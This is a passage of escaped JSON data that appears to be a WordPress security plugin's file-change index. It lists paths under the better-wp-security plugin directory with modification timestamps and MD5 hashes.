tml\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/hash-comparator-chain.php\":{\"d\":1535620875,\"h\":\"46e44494902b1c2e648fc987423270f0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/package-system.php\":{\"d\":1535620875,\"h\":\"e4ddabdc77547e55f6faebd0368979a2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/package-plugin.php\":{\"d\":1535620875,\"h\":\"281ecebc50b5bba287c9e3bd2299f48c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/package-core.php\":{\"d\":1535620875,\"h\":\"b11267edd991d5a8a28b3f6080598e8e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/css\\/settings.css\":{\"d\":1535620875,\"h\":\"fb11b5f8155ec28c329040c9849df7f5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/css\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/logs.php\":{\"d\":1535620875,\"h\":\"7832069eed5648075d8d3ffea709e1dc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/admin.php\":{\"d\":1535620875,\"h\":\"7e2175f42c95508de061730bf9ada218\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/setup.php\":{\"d\":1535620875,\"h\":\"dc798d8c00ef5a99de568d828cd3ed5b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/settings.php\":{\"d\":1535620875,\"h\":\"ffc388afa91ed3a9ffdfc492050b3551\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/settings-page.php\":{\"d\":1535620875,\"h\":\"e83eb70e8718f002e7b190ae942eb032\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/active.php\":{\"d\":1535620875,\"h\":\"957777c629067569779d2fa705320e0b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/deactivate.php\":{\"d\":1535620875,\"h\":\"d6ccab72ab2a6ca69aec751c7ce65f3f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/class-itsec-file-change.php\":{\"d\":1535620875,\"h\":\"ec71874419a0cb3325a8a239487ad172\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/validator.php\":{\"d\":1535620875,\"h\":\"ce8565239b5ebbb702dc0ded42c752e4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/scanner.php\":{\"d\":1535620875,\"h\":\"26e70f1724cdeb38675507273a73efb9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/activate.php\":{\"d\":1535620875,\"h\":\"6cdd39942afddcc579a271e7a8518883\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/js\\/settings-page.js\":{\"d\":1535620875,\"h\":\"12d2e11b43a2d741c822c7b5aa76ebda\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/js\\/admin-away-mode.js\":{\"d\":1535620875,\"h\":\"7ec5147185ec4df40a7fde2265607ec0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/sync-verbs\\/itsec-get-away-mode.php\":{\"d\":1535620875,\"h\":\"522a0d8b81e8a2419e1c83dc07f9b773\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/sync-verbs\\/itsec-override-away-mode.php\":{\"d\":1535620875,\"h\":\"696cd11557267a5e7b9bb0ac5a34a53d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/sync-verbs\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/css\\/images\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/css\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/css\\/jquery-ui.min.css\":{\"d\":1535620875,\"h\":\"fd1ff820fcf875772e26f0260a0b4d9d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/css\\/jquery.datepicker.css\":{\"d\":1535620875,\"h\":\"a995cff531fa79ab6d80037723a61c42\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/logs.php\":{\"d\":1535620875,\"h\":\"f1f7260df287fb687399b647cb5fd4d5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/setup.php\":{\"d\":1535620875,\"h\":\"bcefac71b1a9419bb511be4dfc6edce8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/utilities.php\":{\"d\":1535620875,\"h\":\"cb0ec3cea6eafb35800d1d01aef5ff1f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/settings.php\":{\"d\":1535620875,\"h\":\"2cd45719dca2e27b169df9c29bd1ecab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/settings-page.php\":{\"d\":1535620875,\"h\":\"befb43203f694757ed40b71ce0fd2762\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/active.php\":{\"d\":1535620875,\"h\":\"8b9ae6232add0a837d0a665f09483a05\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/deactivate.php\":{\"d\":1535620875,\"h\":\"0ebdc54a6221d5f12d06e91c8e4bb956\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/validator.php\":{\"d\":1535620875,\"h\":\"b83dd7ebc62aeb4310226155f0031f41\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/activate.php\":{\"d\":1535620875,\"h\":\"bb1fce91e42098ba168a159433fcd907\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/class-itsec-away-mode.php\":{\"d\":1535620875,\"h\":\"d1011ac709d2b3e9be27f6383235e909\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/pro\\/setup.php\":{\"d\":1535620875,\"h\":\"5a6f1078eeae438be029b115e418873c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/pro\\/settings-page.php\":{\"d\":1535620875,\"h\":\"bd234412f17f96d813904d989a54709a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/pro\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/js\\/debug.js\":{\"d\":1535620875,\"h\":\"5330c4ad7c72ebfa516c4323c05b85c3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/js\\/settings-page.js\":{\"d\":1535620875,\"h\":\"5de8da2c0197725bf9f5ddae925c4f7d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/css\\/settings-page.css\":{\"d\":1535620875,\"h\":\"008da836335a8eace05b3c5aedc18792\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/css\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/logs.php\":{\"d\":1535620875,\"h\":\"809bae4f4e701915347c2c9e97f46713\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/setup.php\":{\"d\":1535620875,\"h\":\"d3ec597d83ebf84655c246348f307c39\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/settings.php\":{\"d\":1535620875,\"h\":\"587bfcc9b42c66380032a195666c9c81\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/settings-page.php\":{\"d\":1535620875,\"h\":\"8afe096f057266613a2061608eeb1bd5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/active.php\":{\"d\":1535620875,\"h\":\"8372e30f382be91553d497894b3f3364\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/debug.php\":{\"d\":1535620875,\"h\":\"df3b94113094448fecbfd82683d8eb8c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/class-notification-center.php\":{\"d\":1535620875,\"h\":\"22a4d3a531108631014ed7cf30268d66\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/validator.php\":{\"d\":1535620875,\"h\":\"fb0f0a97dcc61e7556942fd0c27c06fa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/multisite-tweaks\\/class-itsec-multisite-tweaks.php\":{\"d\":1535620875,\"h\":\"fd6919df594a28cd5e2753736cebf10d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/multisite-tweaks\\/setup.php\":{\"d\":1535620875,\"h\":\"b0d1fc05a146b839c3b3df6b4ab01871\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/multisite-tweaks\\/settings.php\":{\"d\":1535620875,\"h\":\"4f042b651ccc0e0237779a84e972266a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/multisite-tweaks\\/settings-page.php\":{\"d\":1535620875,\"h\":\"c9e83ed2386cb0e415eb6a26d33959be\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/multisite-tweaks\\/active.php\":{\"d\":1535620875,\"h\":\"15a693142b639bebe480363cf1eb4a9d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/multisite-tweaks\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/multisite-tweaks\\/validator.php\":{\"d\":1535620875,\"h\":\"3b6cf5ffa0304d31e2fbd128547f65d6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/content-directory\\/utility.php\":{\"d\":1535620875,\"h\":\"1b48f88106f87873b7af7d562a7ff98a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/content-directory\\/settings-page.php\":{\"d\":1535620875,\"h\":\"a07a22f1484675f77044d5186e405e2c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/content-directory\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/salts\\/setup.php\":{\"d\":1535620875,\"h\":\"08088815347a2411f008bf77b2e8c573\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/salts\\/utilities.php\":{\"d\":1535620875,\"h\":\"368df353591c37770f9e5d68f6be6c30\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/salts\\/settings.php\":{\"d\":1535620875,\"h\":\"7846b860564da007e3bb44eae95a7ed3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/salts\\/settings-page.php\":{\"d\":1535620875,\"h\":\"bb8917f14c87fcddf65fcc792f5bc90f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/salts\\/active.php\":{\"d\":1535620875,\"h\":\"ce407ff5715c837d02b1aba7975bf512\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/salts\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/salts\\/validator.php\":{\"d\":1535620875,\"h\":\"3d6e9f7e9ff78590df02413587605b86\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-writing\\/setup.php\":{\"d\":1535620875,\"h\":\"ce407ff5715c837d02b1aba7975bf512\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-writing\\/settings-page.php\":{\"d\":1535620875,\"h\":\"bfb219aaf38b50641b0b6bee7f0c13e3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-writing\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/privacy\\/active.php\":{\"d\":1535620875,\"h\":\"575248d6d607493f5799eb566f1e6004\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/privacy\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/privacy\\/util.php\":{\"d\":1535620875,\"h\":\"9e31e8b017454b679204e7d1c05e6db0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/privacy\\/class-itsec-privacy.php\":{\"d\":1535620875,\"h\":\"d2cfdaef21bd70122c05e70023d99fc3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/js\\/jquery.multi-select.js\":{\"d\":1535620875,\"h\":\"1a0dd3138876ec438b3ff0bb93752209\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/js\\/settings-page.js\":{\"d\":1535620875,\"h\":\"dc37f5da60888ed7305d0648289b8d07\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/img\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/css\\/settings-page.css\":{\"d\":1535620875,\"h\":\"df094aa33aa28949d58ae15d0c45bedb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/css\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/css\\/multi-select.css\":{\"d\":1535620875,\"h\":\"8317a4491407795d85521c820897dbff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/logs.php\":{\"d\":1535620875,\"h\":\"58bba7018c62b7469cbfb5a1afd7fb33\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/setup.php\":{\"d\":1535620875,\"h\":\"1d325fe91b7e843154acb380c0daa4a3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/class-itsec-backup.php\":{\"d\":1535620875,\"h\":\"4eedc777756df63680729535a1bbaca1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/settings.php\":{\"d\":1535620875,\"h\":\"9008dbf53a82e144680c56abef1ed7f3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/settings-page.php\":{\"d\":1535620875,\"h\":\"6003b48178082c80aef80f2b42931b05\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/active.php\":{\"d\":1535620875,\"h\":\"ada70bb4e028b23240df0efa7dbb671c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/deactivate.php\":{\"d\":1535620875,\"h\":\"8633c2adea15f38f74491bf4d543874b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/validator.php\":{\"d\":1535620875,\"h\":\"39fc2e6e08bd7cbf7a5c51c6ffb2b3fd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/activate.php\":{\"d\":1535620875,\"h\":\"c40c6c1c00b1843d1854591c4d5403a4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/privacy.php\":{\"d\":1535620875,\"h\":\"1a88664ea0990621f961d9ec59d8b212\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/strong-passwords\\/js\\/script.js\":{\"d\":1535620875,\"h\":\"f6904be42b2af4be5045181b94fd2b87\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/strong-passwords\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/strong-passwords\\/setup.php\":{\"d\":1535620875,\"h\":\"2295eaa1dbb86cc2f092151e827b4847\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/strong-passwords\\/settings.php\":{\"d\":1535620875,\"h\":\"191076abf2c891d235a00991478b863a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/strong-passwords\\/active.php\":{\"d\":1535620875,\"h\":\"70681f1b7017ef4925ef9a99622bc21f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/strong-passwords\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/strong-passwords\\/validator.php\":{\"d\":1535620875,\"h\":\"7c1b67f73a5ff55eddfdb0cb8d7c8c9b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/strong-passwords\\/class-itsec-strong-passwords.php\":{\"d\":1535620875,\"h\":\"d98499d04720b80b74c754ccb1baad75\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/js\\/settings-page.js\":{\"d\":1535620875,\"h\":\"2e1a3e75fdc2998b5220b0561f753f72\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/js\\/malware.js\":{\"d\":1535620875,\"h\":\"fde1c9b7af846b9e65b6686f4b6d184d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/sync-verbs\\/itsec-do-malware-scan.php\":{\"d\":1535620875,\"h\":\"5e981b0d315e8d67baaf99ce7230ea28\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/sync-verbs\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/sync-verbs\\/itsec-get-malware-scan-log.php\":{\"d\":1535620875,\"h\":\"418d6e1ffef28300691f30768901573b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/css\\/settings.css\":{\"d\":1535620875,\"h\":\"d6968845c58e3470cc6d230f11d30889\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/css\\/malware.css\":{\"d\":1535620875,\"h\":\"b21762c7f514db84d0fbc27ff17b0be9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/css\\/index.php\":{\"d\":1535620875,\"h\":\"67442c5615eba73d105c0715c6620850\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/logs.php\":{\"d\":1535620875,\"h\":\"8687d8b9cd78a987fed2e8d57b84c187\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/setup.php\":{\"d\":1535620875,\"h\":\"ea8accba63e9414b770fd2e654b71ca5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/settings-page.php\":{\"d\":1535620875,\"h\":\"20760a09b5a78dbda2e0cb684ef80554\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/active.php\":{\"d\":1535620875,\"h\":\"ac84cbab30ae5e7bdae8274f531641d0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/class-itsec-malware-scan-results-template.php\":{\"d\":1535620875,\"h\":\"fc423bbdabd4ed1870db1f2b5bb7f514\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/class-itsec-malware.php\":{\"d\":1535620875,\"h\":\"8ce452ed42d9da3f1560f8509155d35c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/class-itsec-malware-scanner.php\":{\"d\":1535620875,\"h\":\"e49ddd32b51e46288bcbbd0226c6b5f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/privacy.php\":{\"d\":1535620875,\"h\":\"6f63f80a04780e8b650e794a0b0615e6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/js\\/settings-page.js\":{\"d\":1535620875,\"h\":\"02ca6131bffa73e242552a52d75037aa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/logs.php\":{\"d\":1535620875,\"h\":\"b1195c21022be28aabe03828021707b7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/class-itsec-ipcheck.php\":{\"d\":1535620875,\"h\":\"89b66d8d24f5cc5db3bd55f8a57f9d7d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/setup.php\":{\"d\":1535620875,\"h\":\"7d1ed352fd590dce562a5dee9d8f37b7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/utilities.php\":{\"d\":1535620875,\"h\":\"d4f962f5dad5900047cc6798e3fec9e8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/settings.php\":{\"d\":1535620875,\"h\":\"f7eb6d20cfe18bc4211b604b72aa10dd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/settings-page.php\":{\"d\":1535620875,\"h\":\"c66f917a4781ac3a156b8e6e1bb246a2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/active.php\":{\"d\":1535620875,\"h\":\"aa0c83580921333d664322b693fa757b\"}